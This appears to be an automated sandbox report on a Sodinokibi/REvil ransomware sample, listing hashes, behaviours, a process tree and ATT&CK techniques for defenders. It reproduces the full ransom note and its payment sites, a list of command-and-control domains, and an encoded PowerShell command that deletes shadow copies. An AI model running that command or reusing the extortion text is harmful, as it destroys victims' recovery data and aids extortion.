Analysis

  • max time kernel
    163s
  • max time network
    165s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 02:19

General

  • Target

    3263ec59c493f40a3dcdd0b595fa8ef8aee8679b6bd441ea6cfe4da715201582.exe

  • Size

    206KB

  • MD5

    9d3792ff6b0ba2e8c4c1b60ab94529e7

  • SHA1

    3ace8b6e446bd89d7bda4619ccf035fdd8fa64ab

  • SHA256

    3263ec59c493f40a3dcdd0b595fa8ef8aee8679b6bd441ea6cfe4da715201582

  • SHA512

    33f3457ec0d2953c7b9b6e539e693ea4ee628f5bf18b45fe7cbd13a63e539e82d8bc4f885cef5114d089fec23dc989ec13acac54f0383af0d55c1da3d4469485

Malware Config

Extracted

Path

C:\3vi9219dk-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3vi9219dk. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/52B4C1B3615A8139 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/52B4C1B3615A8139 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: rZAOYa3BT3diEUlct3Hdia8FEtXnGCMZHefmvsP2ip0cxNq4ddQhgLEYlgFCFsIT pUjx+zYtvITiKI0S9zjWSYfvj9zQs9kKREET0IziSVq/DyKYSqfI3o730AwLc92M aG744nwuNoctRLlhGTQfyGbJ62vCj9WpI1TI4pGN8svHI/UVrMSewUz4t/4V+gdA 0Io23Ln/OXx1smaGydtWHHraCIACRz7S10OSnE/nYOJORTforuVwXFArWSL87FB5 z+G30N2NO13g3lLZOzVnbL/8rtJfC3gCiD8p8se7g45GDzi8POPRiNSrR6yH7LxQ W1If4H+8/d9THzwI59OuaiMNhbxIpZM9WG+n8EU3TLeT1cgyIR7TcTdJpNdlt1aT VOMp+H7ngNAAnMjrwKz63UImeKpi2P1wYN0ATNpkQC669CFA7KCLybL7gQWtd55D g8PZbx8aGbJuDFSPMqmRuxjRFWkuOaHEmq/djxfofi2UPwDFFeUYbUWs8k0WJ7lX 5UOVLXIhiWCZ1YRkv/jMm8PAnJHntrrPJH5V08FB4nC/ryvfdVgdF/kGBdt1oi5w YVEn+NRHLnS7oEZwBsMTGtk7D1pPysp+NCApoQsv5oAhN5qq/RRydVj9wdLA0N8s MqoxRCwATDmbEGYFUd5rDeYViltzwnT80TZbv0SbeDKYttnjmisvo+fJqRTgAr/e rbMckaFtn/GMrbGDBrVN14eKQ1HZSZcg68U/6hPJo+h9a7cJ4nzmaeKYEZmLBqFj +mSIj+ICkCWuOmkYhMrvlcAaK2TwDmP90qoCGS2d1LS6Tp8oWAtcL8l8WRokm4eU qqzC82CpF5BAgwV7f+FQJnXt4XFuvseZOaibF0qObJG1KocFLYeFfAXXJhRUYFT5 Et5gjk6+YIqeblYXyN9odOhcbM9cWZeR+uGFQ+ICDn07TjQVnJORtRF+Gao53W3S 0i9HrgXxLA4SfBMsHpHJ1SAHg0t1tFD1HIMbmC5WftrUReCdKQstA0mx3XgM5BHE WN9gLabsDndiJ9vAtyvXrPspV7uHUOFOa+vms51AefbNdgVQ6uyVfVt57rOBZwiW cUQL0Sg2/+gUIfDw5JbjhpXvNAsr6rZWTq3R1DxXfXLG2+dJgg6ooP2zi+a/4F+S Ll4= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/52B4C1B3615A8139

http://decryptor.cc/52B4C1B3615A8139

Extracted

Family

sodinokibi

Botnet

16

Campaign

2931

C2

juergenblaetz.de

sshomme.com

gavelmasters.com

haus-landliebe.de

imajyuku-sozoku.com

barbaramcfadyenjewelry.com

neolaiamedispa.com

wineandgo.hu

mediogiro.com.ar

arearugcleaningnyc.com

satoblog.org

theater-lueneburg.de

natturestaurante.com.br

magrinya.net

vitoriaecoturismo.com.br

suonenjoen.fi

scentedlair.com

charlesfrancis.photos

sber-biznes.com

drbenveniste.com

Attributes
  • net

    false

  • pid

    16

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    2931

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3263ec59c493f40a3dcdd0b595fa8ef8aee8679b6bd441ea6cfe4da715201582.exe
    "C:\Users\Admin\AppData\Local\Temp\3263ec59c493f40a3dcdd0b595fa8ef8aee8679b6bd441ea6cfe4da715201582.exe"
    1⤵
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Users\Admin\AppData\Local\Temp\3582-490\3263ec59c493f40a3dcdd0b595fa8ef8aee8679b6bd441ea6cfe4da715201582.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\3263ec59c493f40a3dcdd0b595fa8ef8aee8679b6bd441ea6cfe4da715201582.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:524
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3284
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2436

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Change Default File Association

    1
    T1042

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\3263ec59c493f40a3dcdd0b595fa8ef8aee8679b6bd441ea6cfe4da715201582.exe
      MD5

      4dacc5edb44b305ab1f77a33b3e16362

      SHA1

      dd413b4f2e6c4cb8dae4c41d95ef5ae92c1eba50

      SHA256

      85f0d23c08ab9a6ce1cb28c6b0f943127e6425d1fc7baa9404fc87e1324f1cdc

      SHA512

      e4140ad7c232f01045de0ebef18d8048d73ef7afe5147f1c744d2b90c1717ac70259afc494a9f708abf7cb89721d784aca19cba7e1f39bcd09834ea80a0e46da

    • C:\Users\Admin\AppData\Local\Temp\3582-490\3263ec59c493f40a3dcdd0b595fa8ef8aee8679b6bd441ea6cfe4da715201582.exe
      MD5

      4dacc5edb44b305ab1f77a33b3e16362

      SHA1

      dd413b4f2e6c4cb8dae4c41d95ef5ae92c1eba50

      SHA256

      85f0d23c08ab9a6ce1cb28c6b0f943127e6425d1fc7baa9404fc87e1324f1cdc

      SHA512

      e4140ad7c232f01045de0ebef18d8048d73ef7afe5147f1c744d2b90c1717ac70259afc494a9f708abf7cb89721d784aca19cba7e1f39bcd09834ea80a0e46da

    • memory/524-122-0x000002646A600000-0x000002646A622000-memory.dmp
      Filesize

      136KB

    • memory/524-127-0x000002646A7B0000-0x000002646A826000-memory.dmp
      Filesize

      472KB

    • memory/524-133-0x00000264504C3000-0x00000264504C5000-memory.dmp
      Filesize

      8KB

    • memory/524-130-0x00000264504C0000-0x00000264504C2000-memory.dmp
      Filesize

      8KB